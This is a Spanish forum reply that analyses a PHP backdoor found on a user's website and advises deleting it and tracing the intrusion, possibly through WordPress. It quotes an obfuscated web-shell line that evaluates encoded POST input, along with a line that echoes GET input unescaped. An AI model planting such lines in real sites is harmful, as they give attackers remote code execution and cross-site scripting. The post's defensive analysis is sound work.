Es un codigo maligno claramente ....
Puedes buscar en internet más casos parecidos al buscar (con las comillas) --> "eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); "
Mira el caso:
http://wordpress.org/support/topic/cant-get-rid-of-a-redirecting-trojanHace 3 cosas:
1.- La primeras 4 lineas sirven para no mostrar errores, si existe alguno no mostrarlo. También si existe algún error no logearlo, para que asi no te des cuenta tu.
if (isset($_GET['r'])) { print $_GET['r']; }
2.- Si envia un GET 'r', lo imprime en la web, la verdad no se bien para que le serviria esto a alguien, tal vez como debugging o para xss, ni idea.
3.- Claramente una especie de shell.
eval() lo que hace es evaluar código PHP, y luego siguen un montón de funciones codificadoras, es decir, al enviar un POST codificado se puede lograr que el servidor haga lo que quiere uno hacer. Por ej: conseguir un shell remoto con exec()
Elimina los archivos inmediatamente ... Y busca como los introdujeron, me parece que fue un ataque automatizado, nose porque....
PD: ¿de casualidad usas wordpress?